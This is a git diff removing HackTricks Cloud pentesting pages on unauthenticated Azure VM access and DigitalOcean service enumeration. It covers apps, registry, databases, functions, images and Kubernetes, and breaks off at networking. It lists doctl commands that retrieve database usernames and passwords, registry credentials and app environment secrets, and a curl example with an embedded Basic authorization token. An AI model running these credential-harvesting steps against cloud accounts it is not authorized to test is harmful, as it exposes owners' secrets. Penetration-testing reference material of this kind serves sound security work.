-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
deleted file mode 100644
index 2d7ddc48f..000000000
--- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
+++ /dev/null
@@ -1,69 +0,0 @@
-# Az - VMs Unath
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Virtual Machines
-
-For more info about Azure Virtual Machines check:
-
-{% content-ref url="../az-services/vms/" %}
-[vms](../az-services/vms/)
-{% endcontent-ref %}
-
-### Exposed vulnerable service
-
-A network service that is vulnerable to some RCE.
-
-### Public Gallery Images
-
-A public image might have secrets inside of it:
-
-{% code overflow="wrap" %}
-```bash
-# List all community galleries
-az sig list-community --output table
-
-# Search by publisherUri
-az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']"
-```
-{% endcode %}
-
-### Public Extensions
-
-This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it:
-
-```bash
-# It takes some mins to run
-az vm extension image list --output table
-
-# Get extensions by publisher
-az vm extension image list --publisher "Site24x7" --output table
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/README.md b/pentesting-cloud/digital-ocean-pentesting/README.md
deleted file mode 100644
index 66f82c478..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/README.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# Digital Ocean Pentesting
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them.
-
-Concepts such as hierarchy, access and other basic concepts are explained in:
-
-{% content-ref url="do-basic-information.md" %}
-[do-basic-information.md](do-basic-information.md)
-{% endcontent-ref %}
-
-## Basic Enumeration
-
-### SSRF
-
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
-
-### Projects
-
-To get a list of the projects and resources running on each of them from the CLI check:
-
-{% content-ref url="do-services/do-projects.md" %}
-[do-projects.md](do-services/do-projects.md)
-{% endcontent-ref %}
-
-### Whoami
-
-```bash
-doctl account get
-```
-
-## Services Enumeration
-
-{% content-ref url="do-services/" %}
-[do-services](do-services/)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md b/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
deleted file mode 100644
index 3333a417c..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# DO - Permissions for a Pentest
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md b/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
deleted file mode 100644
index 5df4185ea..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# DO - Services
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-DO offers a few services, here you can find how to **enumerate them:**
-
-* [**Apps**](do-apps.md)
-* [**Container Registry**](do-container-registry.md)
-* [**Databases**](do-databases.md)
-* [**Droplets**](do-droplets.md)
-* [**Functions**](do-functions.md)
-* [**Images**](do-images.md)
-* [**Kubernetes (DOKS)**](do-kubernetes-doks.md)
-* [**Networking**](do-networking.md)
-* [**Projects**](do-projects.md)
-* [**Spaces**](do-spaces.md)
-* [**Volumes**](do-volumes.md)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
deleted file mode 100644
index f10dcde2f..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
+++ /dev/null
@@ -1,61 +0,0 @@
-# DO - Apps
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure.
-
-You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app).
-
-When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app.
-
-An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app)
-
-### Enumeration
-
-```bash
-doctl apps list # You should get URLs here
-doctl apps spec get # Get yaml (including env vars, might be encrypted)
-doctl apps logs # Get HTTP logs
-doctl apps list-alerts # Get alerts
-doctl apps list-regions # Get available regions and the default one
-```
-
-{% hint style="danger" %}
-**Apps doesn't have metadata endpoint**
-{% endhint %}
-
-### RCE & Encrypted env vars
-
-To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps//console/`**.
-
-That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**).
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
deleted file mode 100644
index 72897f1e7..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# DO - Container Registry
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker.
-
-When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters.
-
-### Connection
-
-```bash
-# Using doctl
-doctl registry login
-
-# Using docker (You need an API token, use it as username and as password)
-docker login registry.digitalocean.com
-Username:
-Password:
-```
-
-### Enumeration
-
-```bash
-# Get creds to access the registry from the API
-doctl registry docker-config
-
-# List
-doctl registry repository list-v2
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
deleted file mode 100644
index d31d67c7b..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# DO - Databases
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites. - -### Connections details - -When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one). - -The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely. - -{% code overflow="wrap" %} -```bash -sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060 -``` -{% endcode %} - -### Enumeration - -```bash -# Databse clusters -doctl databases list - -# Auth -doctl databases get # This shows the URL with CREDENTIALS to access -doctl databases connection # Another way to egt credentials -doctl databases user list # Get all usernames and passwords - -# Dbs inside a database cluster -doctl databases db list - -# Firewall (allowed IPs), you can also add -doctl databases firewalls list - -# Backups -doctl databases backups # List backups of DB - -# Pools -doctl databases pool list # List pools of DB -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
deleted file mode 100644
index ad37aa951..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# DO - Functions
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance. - -In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\ -Inside the namespace you can then create a function. - -### Triggers - -The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like: - -```bash -curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \ - -H "Content-Type: application/json" \ - -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg=" -``` - -To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:** - -```bash -doctl serverless connect --trace -``` - -**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**. - -{% hint style="danger" %} -In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\ -I couldn't find any way to read them from the CLI but from the console it's straight forward. 
-{% endhint %}
-
-**Functions URLs** look like this: `https://.doserverless.co/api/v1/web//default/`
-
-### Enumeration
-
-```bash
-# Namespace
-doctl serverless namespaces list
-
-# Functions (need to connect to a namespace)
-doctl serverless connect
-doctl serverless functions list
-doctl serverless functions invoke
-doctl serverless functions get
-
-# Logs of executions
-doctl serverless activations list
-doctl serverless activations get # Get all the info about execution
-doctl serverless activations logs # get only the logs of execution
-doctl serverless activations result # get only the response result of execution
-
-# I couldn't find any way to get the env variables form the CLI
-```
-
-{% hint style="danger" %}
-There **isn't metadata endpoint** from the Functions sandbox.
-{% endhint %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
deleted file mode 100644
index eaba5349d..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# DO - Images
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need.
-
-DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community.
-
-When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future.
-
-### Enumeration
-
-```
-doctl compute image list
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
deleted file mode 100644
index d91a05f1d..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# DO - Kubernetes (DOKS)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -### DigitalOcean Kubernetes (DOKS) - -DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include: - -1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters. -2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters. -3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage. -4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date. - -### Connection - -```bash -# Generate kubeconfig from doctl -doctl kubernetes cluster kubeconfig save - -# Use a kubeconfig file that you can download from the console -kubectl --kubeconfig=//k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes -``` - -### Enumeration - -```bash -# Get clusters -doctl kubernetes cluster list - -# Get node pool of cluster (number of nodes) -doctl kubernetes cluster node-pool list - -# Get DO resources used by the cluster -doctl kubernetes cluster list-associated-resources -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
deleted file mode 100644
index 29cf44eb1..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
+++ /dev/null
@@ -1,72 +0,0 @@
-# DO - Networking
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
